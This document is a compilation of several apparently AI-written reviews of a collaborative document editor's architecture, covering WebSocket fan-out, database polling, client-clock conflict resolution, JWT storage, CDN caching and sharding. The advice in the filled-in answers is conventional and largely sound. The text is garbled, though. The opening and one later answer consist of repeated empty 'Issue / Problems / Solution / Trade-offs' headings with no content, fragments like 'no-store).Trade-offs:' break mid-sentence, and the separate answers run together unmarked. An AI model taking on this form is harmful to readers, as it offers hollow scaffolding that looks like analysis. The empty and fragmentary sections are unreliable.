WebSocket Connections: Each server maintains its own WebSocket connections. If a server fails, all its connections will be lost.
API Server Load: Increased user activity might overload the API servers.
Certainly! Here’s a thorough analysis of the potential failure modes, race conditions, and scaling bottlenecks in your collaborative document editor architecture, with specific solutions and their trade-offs.
Issue:
Problems:
Solution:
Trade-offs:
Issue:
Problems:
Solution:
Trade-offs:
Issue:
Problems:
Solution:
Trade-offs:
Issue:
Problems:
Solution:
Trade-offs:
Issue:
Problems:
Solution:
Trade-offs:
Issue:
Problems:
Solution:
Cache-Control: no-store).Trade-offs:
Issue:
Problems:
Solution:
Trade-offs:
Issue:
Problems:
Solution:
Trade-offs:
Issue:
Problems:
Solution:
Trade-offs:
Issue:
Problems:
Solution:
Trade-offs:
Issue:
Problems:
Solution:
Trade-offs:
| Problem | Solution | Trade-offs |
|---|---|---|
| Delayed sync, message loss | Redis/Kafka pub-sub for servers | Infra complexity, more ops |
| Client timestamp conflicts | Server timestamps, OT/CRDT | OT/CRDT is complex but robust |
| DB write contention | Batch writes, event log | Batch risk, compaction needed |
| WebSocket stickiness | LB stickiness, central session | Stickiness limits balancing |
| JWT security | HttpOnly, short expiry, refresh | More auth round-trips |
| CDN caches API | No-store for dynamic endpoints | More backend load |
| Data loss on crash | Incremental event logging | More storage, compaction |
| Polling interval | Push (pub/sub) sync model | New infra |
| Org partition hotspots | Sub-partition by docID | More complex sharding |
| Redis cache HA | Redis Sentinel/Cluster | Ops overhead |
| Frontend/backend version skew | Cache busting, API versioning | Deploy complexity |
TL;DR:
This architecture broadly covers a real-time collaborative editor but has several potential failure modes, race conditions, and scaling bottlenecks due to design choices like polling, last-write-wins, and distributed WebSocket connections. Below is a detailed analysis and recommendations:
Issue:
Using client-side timestamps for LWW is unreliable. Client clocks can be skewed or manipulated, causing inconsistent conflict resolution and data loss.
Impact:
Edits may be overwritten incorrectly, leading to lost user data or inconsistent document state.
Solution:
Use server-generated timestamps or a logical clock (Lamport clock or vector clocks) to order changes deterministically.
Issue:
Polling PostgreSQL every 2 seconds for changes introduces latency in syncing edits across servers. This affects real-time collaboration experience.
Race Condition:
If two servers receive concurrent edits for the same paragraph, polling delay may cause conflicting states before reconciliation.
Scalability Bottleneck:
Frequent polling can overload the database, especially with increasing server count and users.
Solution:
Implement a centralized message broker or pub/sub system (e.g., Redis Pub/Sub, Kafka) to propagate changes instantly to all servers.
Issue:
WebSocket clients connected to different servers do not share state natively. Server-to-server communication is needed for real-time sync.
Failure Mode:
If a server crashes, all its WebSocket connections drop, disconnecting users.
Solution:
Issue:
Writing every keystroke or small change immediately to PostgreSQL is a performance bottleneck.
Scaling Bottleneck:
High write throughput can overwhelm the DB, causing latency spikes and possible downtime.
Solution:
Issue:
Saving entire document snapshots causes large write operations and storage use.
Scaling Bottleneck:
Large documents and frequent snapshots increase DB size, IO, and backup times.
Solution:
Security Risk:
LocalStorage is vulnerable to XSS attacks, risking token theft and session hijacking.
Solution:
Store tokens in HttpOnly Secure cookies with proper SameSite flags to mitigate XSS risks.
Issue:
Caching API responses for 5 minutes can cause clients to receive stale data, breaking real-time collaboration consistency.
Solution:
Issue:
Round-robin does not respect WebSocket session affinity, causing frequent reconnects or broken sessions.
Solution:
Implement sticky sessions or session-aware load balancing to keep WebSocket connections stable.
Issue:
Single PostgreSQL write master can become bottleneck for high concurrent writes.
Solution:
Issue:
Redis used for session cache can become a bottleneck or single point of failure.
Solution:
Potential Bottleneck:
Uneven distribution of users per organization can cause hotspots.
Solution:
| Issue | Impact | Solution | Trade-off |
|---|---|---|---|
| Client-side timestamps for LWW | Data inconsistency and loss | Use server or logical clocks | Increased complexity |
| Polling DB every 2 seconds | Latency, DB overload | Use pub/sub message broker | Added infra, complexity |
| Distributed WebSocket connections | User disconnect on server crash | Sticky sessions or shared state | Reduced LB flexibility, complexity |
| Immediate DB writes per change | DB write bottleneck | Batch writes or event sourcing | Durability risk on crash |
| Full HTML snapshot every 30s | Large storage and IO | Store diffs + snapshots | Complex reconstruction logic |
| JWT in localStorage | XSS vulnerability | Use HttpOnly Secure cookies | Need CSRF protection |
| CloudFront caches API for 5 minutes | Stale data, broken real-time | Disable caching for API endpoints | More API load |
| Round-robin LB for WebSockets | Connection instability | Sticky sessions or WebSocket gateway | LB flexibility, added infra |
| Single DB write master | Write bottleneck | Sharding, multi-master DBs | Operational complexity |
| Redis as single session cache | SPOF | Redis cluster with replication | Infra complexity |
| Uneven document partitioning | Hotspots | Dynamic rebalancing | Management complexity |
Implementing these will improve consistency, scalability, security, and user experience in the collaborative document editor.
Let's analyze the architecture step-by-step to identify potential failure modes, race conditions, and scaling bottlenecks, along with proposed solutions and their trade-offs.
Issue: Clients may disconnect unexpectedly due to network issues, server crashes, or load balancer timeouts.
Impact: Loss of real-time updates, potential data inconsistency if not handled properly.
Solution: Implement heartbeat/ping messages to detect dead connections; use WebSocket reconnection strategies on the client.
Trade-off: Increased complexity and network overhead; potential for reconnection storms under high churn.
Issue: Since each API server maintains its own WebSocket connections, load balancer round-robin may distribute WebSocket connections unevenly, causing some servers to be overloaded or underutilized.
Impact: Inefficient resource utilization; potential for dropped connections or latency.
Solution: Use sticky sessions (session affinity) or an application-level routing layer for WebSockets, ensuring clients connect to the same server throughout their session.
Trade-off: Sticky sessions can reduce load balancing flexibility and may require session management.
Issue: Network partitions, disk failures, or database overload could cause write failures.
Impact: Lost changes, inconsistent document state.
Solution: Implement retries with exponential backoff, write-ahead logging, and ensure transactions are atomic.
Trade-off: Increased latency during retries; potential for write conflicts if not handled properly.
Issue: Redis could crash or become unreachable.
Impact: Loss of session data or cache invalidation issues.
Solution: Use Redis persistence modes (RDB or AOF), set up Redis Sentinel for failover, or have a fallback to database for critical data.
Trade-off: Additional overhead and complexity; slightly increased latency.
Issue: Multiple servers broadcast changes to clients connected to different servers, but clients connected to server A might miss updates if server B crashes or is slow.
Impact: Inconsistent document views among clients.
Solution: Implement a centralized message bus (e.g., Redis Pub/Sub or Kafka) for broadcasting changes across servers.
Trade-off: Additional infrastructure complexity and latency.
Issue: Relying solely on timestamps from client clocks can lead to race conditions, especially if clocks are unsynchronized.
Impact: Overwritten changes that are actually later, leading to data loss or confusion.
Solution: Use Lamport timestamps or vector clocks to establish causality, or implement Operational Transformation (OT) or Conflict-free Replicated Data Types (CRDTs) for real-time conflict resolution.
Trade-off: Increased system complexity; OT/CRDTs require significant engineering effort.
Issue: Race conditions may occur if servers read stale data or miss updates between polls.
Impact: Users see outdated content, or conflicting updates.
Solution: Use PostgreSQL's NOTIFY/LISTEN feature to push change notifications to servers, reducing polling frequency and latency.
Trade-off: Additional complexity, potential scalability issues with notification channels.
Issue: PostgreSQL writes are centralized; high write volume can cause bottlenecks.
Impact: Increased latency, potential downtime.
Solution: Use sharding for documents, or employ CQRS pattern—separate command (write) and query (read) models. Consider distributed databases designed for high write throughput (e.g., CockroachDB, YugabyteDB).
Trade-off: Increased complexity in data management and querying.
Issue: Storing full snapshots every 30 seconds increases storage and I/O load, especially for large documents.
Impact: Slow backups, increased storage costs, potential I/O bottleneck.
Solution: Store diffs/patches or OT logs instead of full snapshots, reconstructing full document state as needed.
Trade-off: More complex storage and retrieval logic; may impact performance.
Issue: Each server maintains many WebSocket connections; as user base grows, server memory and CPU demand increase.
Impact: Resource exhaustion, degraded performance.
Solution: Use WebSocket multiplexing or message brokers (like Redis Pub/Sub) to offload some messaging; horizontally scale WebSocket servers with load balancing.
Trade-off: Increased system complexity and potential message routing delays.
| Concern | Potential Issue | Proposed Solution | Trade-offs |
|---|---|---|---|
| JWT token storage in localStorage | Vulnerable to XSS attacks | Use HttpOnly cookies | Slightly less convenient in client code |
| Static asset caching | Cache invalidation issues | Implement cache busting strategies | Increased deployment complexity |
| Document partitioning | Cross-organization queries or shared documents | Enforce strict partitioning; avoid cross-partition joins | Limits querying flexibility |
Overall, the architecture is a solid starting point but requires enhancements in conflict resolution, data consistency, connection management, and scalability to handle real-world load and failure scenarios robustly.
This architecture is designed to support a real-time collaborative document editor but has several potential failure modes, race conditions, and scaling bottlenecks. Let's identify these issues and propose solutions for each:
WebSocket Connection Failure:
API Server Failure:
Database Write Bottleneck:
Cache Invalidation for API Responses:
Data Consistency and Sync Issues:
Timestamp-based Conflict Resolution:
Polling for Changes:
WebSocket Scalability:
Database Scalability:
By addressing these issues with the proposed solutions, the architecture can be made more resilient, scalable, and consistent, accommodating growth and providing a better user experience.
In the architecture you've described for a real-time collaborative document editor, various potential failure modes, race conditions, and scaling bottlenecks can arise. Below, I outline these issues along with proposed solutions and their associated trade-offs.
Issue: WebSockets can disconnect due to network issues or server crashes, leading to loss of real-time updates for users.
Solution: Implement a reconnection strategy that attempts to re-establish the WebSocket connection automatically. Additionally, use a queue on the client-side to store unsent changes during disconnection and send them once reconnected.
Trade-offs: This increases complexity on the client-side and may introduce a delay in sending updates, but it improves user experience by minimizing disruption.
Issue: PostgreSQL might be unavailable or have performance issues, leading to failed writes or reads.
Solution: Implement a retry mechanism with exponential backoff for database operations. Additionally, consider using a message queue system (like RabbitMQ) to queue changes when the database is down, allowing for eventual consistency.
Trade-offs: This adds complexity and potential latency in syncing changes, but it enhances system reliability.
Issue: If an API server crashes, all connected clients will lose their connection.
Solution: Use a sticky session approach with the load balancer to ensure users reconnect to the same server, and implement a health check mechanism to quickly reroute traffic to healthy servers.
Trade-offs: Sticky sessions can lead to uneven load distribution, but they help in maintaining connection state.
Issue: Two users editing the same document section simultaneously could lead to data inconsistency.
Solution: Instead of a simple last-write-wins strategy, implement operational transformation (OT) or conflict-free replicated data types (CRDTs) for better handling of concurrent edits.
Trade-offs: OT and CRDTs are more complex to implement but provide a better user experience by allowing real-time collaboration without losing changes.
Issue: Servers polling for changes every 2 seconds might read stale data or miss changes made by users connected to other servers.
Solution: Instead of polling, consider using a pub/sub mechanism where changes are published to a message broker (like Redis Pub/Sub) and subscribed to by all servers.
Trade-offs: This requires additional infrastructure and complexity, but it reduces the chances of stale reads and improves real-time sync.
Issue: As the number of users grows, the database may become a bottleneck, especially for write operations.
Solution: Implement database sharding based on document ownership or organization ID to reduce load on individual database instances. Use read replicas to balance read operations.
Trade-offs: Sharding increases complexity in database management and may require changes to application logic, but it significantly improves scalability.
Issue: Each API server has a limit on the number of concurrent WebSocket connections it can handle.
Solution: Introduce a WebSocket gateway layer that can handle connections and distribute messages to the appropriate API servers. Use load balancing for WebSocket connections.
Trade-offs: This introduces an extra layer in the architecture, which can add latency but allows for better management of connections and scaling.
Issue: Using Redis for session caching may lead to stale data if not handled properly.
Solution: Implement a cache invalidation strategy, such as time-based expiration or invalidating the cache on certain write operations.
Trade-offs: While this adds complexity to the caching layer, it ensures data consistency and reduces the risk of serving outdated data.
By addressing these potential failure modes, race conditions, and scaling bottlenecks, the architecture can be made more robust and scalable. The trade-offs involved in each solution should be carefully considered based on the specific performance needs and user experience expectations of the collaborative document editor.
Key issues fall into consistency, real‑time propagation, storage, scaling, and security.
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution options:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
Solution:
Trade-offs:
A typical production architecture instead uses:
This avoids polling, reduces DB load, and ensures consistent real‑time collaboration.
Great prompt. This architecture has several correctness, availability, and scalability risks that will show up quickly under real collaborative load.
Below is a structured review of failure modes + concrete fixes + trade-offs.
Each API server only broadcasts to WebSocket clients connected to that server.
Users on different servers won’t see updates immediately (or at all until poll catches up).
Add a cross-node pub/sub layer (Redis Pub/Sub, NATS, Kafka, or managed equivalent).
On receiving an edit, publish to document channel; all servers subscribed fan out to local sockets.
Polling creates lag + load, and can miss ordering nuances.
Replace polling with push:
Clock skew, bad device clocks, malicious clients can “win” incorrectly.
Use server-assigned monotonic versioning per document (sequence numbers or Lamport/vector clocks).
For true collaborative editing, use OT or CRDT rather than paragraph-level LWW.
Two users edit different words in same paragraph; one overwrites the other.
Use operation-based model:
Edits can arrive in different orders on different nodes.
Per-document sequencer (single writer shard) or ordered log partition by doc_id.
Typing generates huge write QPS; DB becomes bottleneck.
Buffer edits in memory/event log, persist in batches (e.g., every N ops / seconds), plus periodic snapshots.
Write amplification + storage bloat + hard diff/replay semantics.
Store:
Dynamic/authenticated API responses cached and served stale or to wrong users if cache key misconfigured.
Do not cache mutable/auth APIs at CDN by default.
If caching, use strict cache keys (Authorization, tenant, doc), short TTL, and Cache-Control: private, no-store where needed.
XSS can steal token; long-lived token increases blast radius.
Use httpOnly, secure, sameSite cookies + short-lived access tokens + refresh rotation + token revocation list.
Socket stays alive after token expiry/revocation.
Revalidate auth on socket connect + periodic checks + forced disconnect on revocation event.
Reconnects land on different servers; local in-memory session/state lost.
Use either:
Network retry sends same op multiple times.
Attach operation IDs (UUID + client seq), dedupe per document/client.
Slow clients/sockets buffer indefinitely; memory blowups.
ACKed delivery windows, bounded queues, drop/close slow consumers, resumable sync via version catch-up.
Replica lag gives stale reads for active documents.
Route collaborative doc reads to primary or session-consistent store; use replicas only for analytics/search/non-critical reads.
Hot-tenant problem: one large org overloads a shard.
Partition primarily by document_id (or hash), optionally with org-aware placement constraints.
In-flight edits in memory are lost if node crashes before DB persist/broadcast.
Write-ahead to durable log before ACK (Kafka/Redis Stream with AOF), then process/broadcast.
Region outage = total downtime/data unavailability.
Define RPO/RTO; implement cross-region replication + failover strategy. For real-time collab, usually active-passive per document region.
Stored XSS/script injection in document HTML.
Use structured document model (ProseMirror/Slate schema) and sanitize/render safely server-side + CSP.
Hard to diagnose ordering and merge bugs without traceability.
Instrument per-op tracing: doc_id, op_id, version, server, latency; define SLOs for fanout lag/conflict rate.
Different components assume different guarantees (eventual vs strong).
Define contract clearly:
If you want, I can sketch a concrete “v2” design with specific tech choices (e.g., Redis Streams vs Kafka, OT vs Yjs CRDT) and expected throughput limits.
Here’s a structured teardown of the architecture: failure modes, race conditions, correctness issues, security problems, and scaling bottlenecks — plus concrete fixes and trade-offs.
Each API server only broadcasts to clients connected to itself. Clients connected to different servers won’t see updates until those servers poll PostgreSQL 2 seconds later.
Use a shared realtime fan-out layer:
Each server publishes incoming operations to a shared channel keyed by document ID, and all servers subscribed to that document broadcast immediately to their local WebSocket clients.
Using the primary database as a synchronization bus is a bad fit.
Stop polling PostgreSQL for realtime sync. Use:
This is one of the most dangerous design choices.
Do not use client time for conflict resolution.
Use one of:
For rich text collaborative editing, OT or CRDT is the right answer.
Saving full HTML snapshots is expensive and unsafe as the primary source of truth.
Store:
Then derive HTML for rendering/export.
If edits arrive at different servers, there is no authoritative ordering before persistence and rebroadcast.
Create per-document ordering:
Paragraph-level overwrite loses intent. Two users changing different words in the same paragraph will conflict unnecessarily.
Move from paragraph-level overwrite to operation-level editing:
A change may be:
Without idempotency, clients can apply same change twice.
Every operation needs:
If a client disconnects briefly, it may miss operations sent while offline.
Use resumable streams:
WebSocket send does not imply client processed the message.
Implement explicit protocol:
Sequence described is:
What if broadcast succeeds but DB write fails? Or DB succeeds and broadcast fails?
Define a transactional ingestion path:
If using event log, broadcast consumers only emit committed events.
Read replicas are often asynchronously replicated.
For collaboration-critical reads:
Document collaboration hotspots are by document, not org. Organization-based partitioning can create skew.
Partition by document ID or hashed document ID. Optionally colocate metadata by org for admin queries, but realtime doc processing should shard by doc.
Round-robin without session affinity can cause reconnects to land anywhere, which is okay only if backend state is shared properly. In current design it is not.
Either:
Avoid depending on sticky sessions for correctness.
Each server holds active WebSocket connections and maybe ephemeral session/presence info.
Some clients or servers will be slow.
Implement backpressure:
A popular doc with hundreds/thousands of editors creates a concentrated hotspot.
For hot docs:
localStorage is vulnerable to token theft via XSS.
Use:
Long-lived bearer tokens are risky, especially for collaborative apps used in browsers.
Caching API responses broadly is dangerous for auth, document freshness, and privacy.
Do not CDN-cache mutable authenticated document APIs unless very carefully controlled.
Clients are untrusted.
Server-authoritative sequencing and validation.
If every edit event hits PostgreSQL synchronously, write amplification will be severe.
Options:
If a single document row is frequently updated, MVCC churn and row contention become painful.
Use append-only operations table/log instead of repeatedly rewriting one giant document row. Checkpoint periodically into snapshots.
HTML from browser/editor is not a stable canonical model.
Canonical structured editor model + strict sanitization for imported/exported HTML.
If edits are acknowledged before durable persistence and only snapshots happen every 30s, crash can lose “saved” work.
Durable operation append before ack. Snapshot only for compaction, not durability.
Clients may receive:
Version every op and require ordered apply. Buffer out-of-order messages until missing versions arrive or trigger resync.
WebSockets may appear connected while dead due to proxies/NATs.
Heartbeat protocol with timeout-based disconnect and reconnect.
Ephemeral high-frequency updates can overwhelm critical edit pipeline.
Separate channels:
With naive LWW and snapshots, collaborative undo is ill-defined.
Use operation-based model with per-user undo semantics integrated with OT/CRDT/editor framework.
If users go offline and edit, reconnecting with LWW timestamps is destructive.
If offline support is needed:
As editor features evolve, old snapshots/ops may become incompatible.
Version the document schema and operation format; support migration or transcoding.
Current design lacks clear operation lineage.
Maintain audit trail:
Collaborative endpoints are easy to abuse.
A stronger architecture would look like this:
document_id.If you had to improve this incrementally:
| Issue | Risk | Fix | Trade-off |
|---|---|---|---|
| Local-only WebSocket broadcast | stale/inconsistent updates | shared pub/sub or doc shard | extra infra |
| DB polling for sync | latency, DB load | event bus | complexity |
| Client timestamp LWW | lost edits, abuse | OT/CRDT/server sequencing | hard implementation |
| Full HTML snapshots | write amp, poor merges | op log + snapshots + canonical model | more data model work |
| No global ordering | divergence | per-doc sequencer/leader | hotspot management |
| Paragraph conflict unit | excessive overwrites | character/range ops | editor integration |
| Duplicate change application | corruption | op IDs + idempotency | metadata overhead |
| Reconnect gaps | stale clients | replay by version | op retention needed |
| No ack protocol | ambiguous state | explicit acks | protocol complexity |
| DB write/broadcast race | phantom/lost edits | commit then broadcast from log | slight latency |
| Read replica lag | stale reads | primary/leader reads | more primary load |
| Partition by org | skew/hotspot | shard by doc ID | harder org queries |
| Round-robin WS | inconsistent state | stateless gateways or doc routing | routing complexity |
| Server crash | disconnect/state loss | durable ops + reconnect/resume | more engineering |
| Slow consumers | memory bloat | backpressure/disconnect | slow clients resync |
| Hot docs | shard overload | dedicated doc shard, batching | special handling |
| JWT in localStorage | token theft | HttpOnly cookies/short tokens | auth complexity |
| 24h JWT | long compromise window | short-lived + refresh | more token flow |
| CDN API caching | stale/leaked data | no-store/private | more origin traffic |
| Per-keystroke DB writes | DB bottleneck | batching/log append | complexity |
| HTML canonical storage | inconsistency/XSS | structured model | conversions needed |
If you want, I can also provide:
Below are the main failure modes, race conditions, and scaling bottlenecks in this design, with concrete fixes and trade-offs.
Using timestamps from client clocks is highly unsafe.
Failure modes:
Use server-assigned ordering or a proper conflict-free editing model:
base_versionEvery keystroke causes a DB write. This creates:
Introduce an append-only change log or event stream:
Updates only reach clients on the same API server, while other servers poll the database every 2 seconds.
Failure modes:
Use a shared pub/sub backbone:
Polling is inefficient and creates scaling bottlenecks.
Failure modes:
Replace polling with event-driven notification:
LISTEN/NOTIFY for lightweight signaling, plus a durable changes table for replay.“Last timestamp wins” is not safe for collaborative text editing.
Failure modes:
Use:
If paragraph-level:
paragraph_id, base_version, and patch.Snapshots every 30 seconds are too coarse and inefficient.
Failure modes:
Use incremental persistence:
WebSocket connections are sticky by nature, but the architecture doesn’t mention session affinity or reconnection strategy.
Failure modes:
Implement:
localStorageStoring JWTs in localStorage is vulnerable to XSS theft.
Failure modes:
Use HttpOnly, Secure, SameSite cookies for auth, or short-lived access tokens with refresh tokens in HttpOnly cookies. Also:
A 24-hour token is too long-lived for a collaborative SaaS application.
Failure modes:
Caching dynamic API responses through CloudFront can serve stale document state and even stale auth-dependent data.
Failure modes:
Cache-Control: no-store on auth/session-sensitive and live document endpoints.PostgreSQL can be a bottleneck under high-frequency collaborative edits.
Failure modes:
Split responsibilities:
Add:
Read replicas do not help real-time consistency if they lag.
Failure modes:
Use replicas only for:
For document sessions:
Partitioning by org may create hot partitions if one org is much larger or more active.
Failure modes:
Partition by a higher-cardinality key:
org_id + document_idWebSocket retries, reconnects, and network glitches can duplicate edits.
Failure modes:
Make every mutation idempotent:
Typing generates high-frequency messages.
Failure modes:
If all updates are treated the same, transient UI signals can overload the system.
Separate:
Use a different channel or lower durability path for presence.
If one API server dies, all its socket-connected users lose in-flight state.
Failure modes:
The architecture doesn’t define whether edits are at-most-once, at-least-once, or exactly-once.
Failure modes:
Define a protocol:
op_id, doc_id, base_versionack(op_id, new_version)A large team editing the same doc concentrates load on one document row or blob.
Failure modes:
Store documents as smaller independently mutable units:
Storing full HTML snapshots is fragile for collaborative editing.
Failure modes:
Use an internal structured document model:
HTML snapshots and user-generated content can carry XSS risks.
Failure modes:
This system will be difficult to debug without strong tracing and metrics.
Failure modes:
Add:
If you want this to behave like a real collaborative editor, a safer design is:
Client
WebSocket/API servers
Event bus
Document service/storage
Auth
CDN
If you only change a few things, these are the most important:
If you want, I can turn this into a risk matrix with severity/probability, or propose a corrected reference architecture with components and data flow.
Below is a structured list of likely failure modes, race conditions, and scaling bottlenecks in your design, with a concrete mitigation and trade-offs for each. (Some issues are “systemic” because the architecture relies on client clocks, per-server WebSockets, polling, and periodic full snapshots.)
Failure mode:
If clients for the same document are connected to different API servers, updates sent by Server A won’t reach clients on Server B until Server B’s polling loop picks them up (2s delay), causing visible lag, inconsistent cursors, or temporary divergence.
Specific solution:
Use a shared pub/sub bus for realtime events:
Trade-offs:
Bottleneck:
Polling all documents every 2 seconds doesn’t scale—especially with many documents or write-heavy editing. It also creates inherent staleness up to 2 seconds (bad UX).
Specific solution:
Replace polling with event-driven updates:
Trade-offs:
Race condition / failure mode:
Client timestamp comparisons will be wrong when clocks differ or when device time changes (NTP adjustments, manual changes, mobile sleep/wake). Two edits may be applied out of intended order.
Specific solution:
Use server-assigned ordering per document:
revision (or opId) assigned by the server.revision and/or uses vector clocks/lamport timestamps.revision ordering (not client time).Trade-offs:
Failure mode:
Paragraph-level last-write-wins will still corrupt content when edits overlap partially, insertions shift offsets, or formatting changes occur.
Specific solution (recommended):
Use an actual collaborative editing algorithm:
Trade-offs:
(If you must keep last-write-wins temporarily, at least operate on smaller units than “paragraph” such as character ranges, and incorporate server revision ordering.)
Failure mode:
If the same client reconnects or new connections occur, they may land on different servers. Without a shared realtime pipeline, state consistency depends on slow polling.
Specific solution:
Trade-offs:
Bottleneck:
High-frequency writes (every input event) can overwhelm PostgreSQL, WAL, indexes, and replication.
Specific solutions (choose one or combine):
Trade-offs:
Failure mode:
Specific solution:
Trade-offs:
Failure mode:
If API responses that include document content/state are cached, clients can receive stale versions or stale revision numbers for up to 5 minutes, causing overwrites or confusing UI.
Specific solution:
Trade-offs:
Failure mode:
Specific solution:
Trade-offs:
Failure mode:
If Redis caches doc/session state but updates are only written to Postgres, you can get divergence:
Specific solution:
Trade-offs:
Race condition:
Even with “last timestamp wins”, persistence order across servers may not match actual edit order. Also, if each server independently persists to Postgres without a consistent per-doc sequencing mechanism, you can get revisions applied in an unexpected order.
Specific solution:
orgId + docId into shards.Trade-offs:
Failure mode:
WebSocket reconnections, network retries, or client resends can cause the same “change event” to be applied twice.
Specific solution:
clientOpId (unique per doc per client/session).Trade-offs:
Failure mode:
If a client’s network is slow, the server may buffer outbound events, leading to memory pressure or event drops. If events drop, doc divergence can occur.
Specific solution:
Trade-offs:
Failure mode:
After deployment or network disruption, many clients reconnect simultaneously to different servers. Each may:
Specific solution:
Trade-offs:
Race condition:
Snapshot jobs might read while writes continue, resulting in snapshots not matching the change-log boundary.
Specific solution:
currentRevision = maxRevisionForDoc.Trade-offs:
Failure mode:
If some servers read from replicas (read-heavy) but writers commit to primary, replicas may lag. Clients could fetch a revision that hasn’t yet appeared on the replica, causing missing operations or overwrites.
Specific solution:
Trade-offs:
Failure mode:
Users editing for >24h lose auth, causing server to drop WS connections or reject requests. Collaboration breaks.
Specific solution:
Trade-offs:
Failure mode:
If invalidation/invalidation logic is imperfect, CDN continues serving stale doc state while realtime events try to correct it. The result may look like “it updates then reverts”.
Specific solution:
Trade-offs:
If you want, I can propose a concrete revised design (schema + event protocol) that keeps your stack (React/WS/Node/Postgres/Redis) but fixes the correctness/scalability issues, including: revisions, op-idempotency, pub/sub fanout, checkpointing strategy, and reconnect semantics.
This architecture will work for a demo, but it has major correctness, latency, and security problems for a Google-Docs-like editor.
| Issue | Failure mode / race | Specific fix | Trade-offs |
|---|---|---|---|
| Client timestamps for conflict resolution | Clock skew, incorrect device time, malicious clients sending future timestamps; later arrival may wrongly overwrite earlier causal edits | Use server-assigned monotonic document revisions or a single authoritative sequencer per document. For true collaborative editing, use OT or CRDT instead of LWW | More implementation complexity; single-writer-per-doc can create a hot-doc bottleneck |
| Last-write-wins at paragraph granularity | Two users edit different characters in the same paragraph and one loses all work | Use character/block-level operations with OT/CRDT (e.g. Yjs, ProseMirror collab, Automerge) | More metadata, more complex merge logic |
| No total ordering across servers | User on server A sees op1 then op2; user on server B sees op2 then op1 after polling; document diverges | Assign a per-document sequence number at one authority (doc owner/shard) and apply ops in sequence | Requires routing or coordination |
| DB commit order vs timestamp order | Two concurrent writes race in PostgreSQL; the transaction that commits last wins even if it has the “older” client timestamp | Use append-only ops + version check (expected_revision) or a sequencer; avoid blind overwrites of document state | More retry logic or ownership logic |
| Equal timestamps / timestamp collisions | Ties create nondeterministic winners | Don’t use timestamps for ordering; use sequence numbers | None, other than rework |
| Out-of-order delivery after polling | Clients on different servers receive changes late and in batches; applying naively can corrupt state | Use revisioned ops; buffer until missing revisions arrive; or move to pub/sub with ordering per doc | Slightly more state on client/server |
| Fetch/subscribe race | Client loads document snapshot, then opens WebSocket; edits committed between those steps are missed | Return snapshot with a revision number; WebSocket subscribe must say “start from revision N”; server replays N+1…current before live mode | Requires keeping recent op log |
| Duplicate delivery on reconnect/retry | Client resends an op after timeout; server applies it twice | Give every client op a UUID/idempotency key; dedupe per document | Dedupe state in memory/Redis/log |
| Lost local edits on reconnect | User types, network drops, app reconnects to a different server, pending ops vanish or get replayed wrong | Client keeps a pending op queue and resends unacked ops from last known revision | More client complexity |
| Offline edits clobber online edits | Offline user comes back with old base state; LWW overwrites newer edits | Use OT/CRDT or at least “op with base revision + server-side rebase/reject” | Rebase logic is nontrivial |
| Snapshot overwrite race | Background snapshot generated from older state may overwrite newer state if save isn’t versioned | Store snapshots with document revision and only commit them if based on the latest expected revision | More metadata; snapshot retries |
| HTML as the source of truth | HTML is non-canonical; same edit can serialize differently across browsers; formatting changes become hard to merge | Use a structured document model (ProseMirror JSON, Slate nodes, etc.) as source of truth; render HTML on read/export | Requires editor model migration |
| Structural edits break paragraph IDs | Splits/merges/lists make “same paragraph” ambiguous | Give blocks/nodes stable IDs and operate on those | Extra model complexity |
| Issue | Failure mode / bottleneck | Specific fix | Trade-offs |
|---|---|---|---|
| Broadcast only to clients on the same server | Collaborators on other servers see edits up to 2s late; not acceptable for real-time editing | Introduce a cross-server fanout mechanism: Redis Pub/Sub, Redis Streams, NATS, Kafka, or a dedicated collaboration service | New infrastructure |
| Servers poll PostgreSQL every 2 seconds | High DB load, stale UX, bursty updates, poor tail latency | For small scale: Postgres LISTEN/NOTIFY. For production scale: Redis Streams / NATS / Kafka with per-doc topics or partitioning | LISTEN/NOTIFY is simple but limited; Streams/Kafka add ops burden |
| Polling by timestamp | Misses rows with same timestamp; skew breaks cursoring | Poll by monotonic revision/LSN/sequence, not timestamp | Requires schema changes |
| Round-robin LB spreads one document’s users across many servers | Every edit must cross servers; cross-node chatter grows with participants | Route by document ID affinity (consistent hashing or “doc owner” routing) so most collaborators on a doc hit the same collab shard | Harder rebalancing; hot docs still hot |
| No authoritative doc owner | Any server can accept writes for same doc; ordering becomes distributed and messy | Make each document have a single active owner/shard that sequences ops | Must handle owner failover correctly |
| Split-brain risk if using doc ownership | Two servers may think they own same doc during failover, causing duplicate writers | Use leases with fencing tokens via etcd/Consul/ZK; avoid weak ad-hoc locks | More infra complexity |
| Server crash between DB write and broadcast | Write committed, but some clients never hear about it until reconnect/poll | Use a transactional outbox or make the durable op log the source of truth and drive fanout from it | Extra table/consumer or event system |
| Server crash before DB write but after local optimistic UI | User believes edit was saved, but it was not | Client should optimistically render locally, but server must ack only after durable append; client retries unacked ops | More protocol complexity |
| Slow consumer problem | Mobile/slow clients accumulate huge outbound queues; server memory grows | Put bounds on per-connection send queues; if exceeded, drop connection and force snapshot+replay | Slow clients reconnect more often |
| No heartbeat / presence TTL | Dead connections linger; presence indicators wrong | Use WebSocket ping/pong, server-side TTLs, and presence in ephemeral store | Slight extra traffic |
| Rolling deploys / connection draining not handled | Massive reconnect storms, dropped edits during deploy | Support graceful drain, stop accepting new docs, ask clients to reconnect with last revision | More deployment logic |
| Per-keystroke messages | Too many messages/network interrupts under high typing rates | Coalesce keystrokes into ops every 20–50ms or use semantic editor ops | Slightly higher local latency, but usually imperceptible |
| Large paste / format-all operations | Huge WebSocket frames, event loop stalls, DB spikes | Chunk large ops, enforce limits, maybe treat as specialized bulk ops | More edge-case handling |
| Issue | Failure mode / bottleneck | Specific fix | Trade-offs |
|---|---|---|---|
| Write every change to PostgreSQL | Primary becomes the bottleneck; high fsync/WAL/index churn; p99 latency hurts typing UX | Use an append-only operation log, ideally with batching; snapshot current state periodically rather than rewriting full state per keystroke | More moving parts |
| If updates are full-document or full-paragraph writes | Row lock contention, TOAST churn, large WAL, poor vacuum behavior | Store small ops and periodic snapshots; avoid whole-document overwrite per keystroke | Requires new data model |
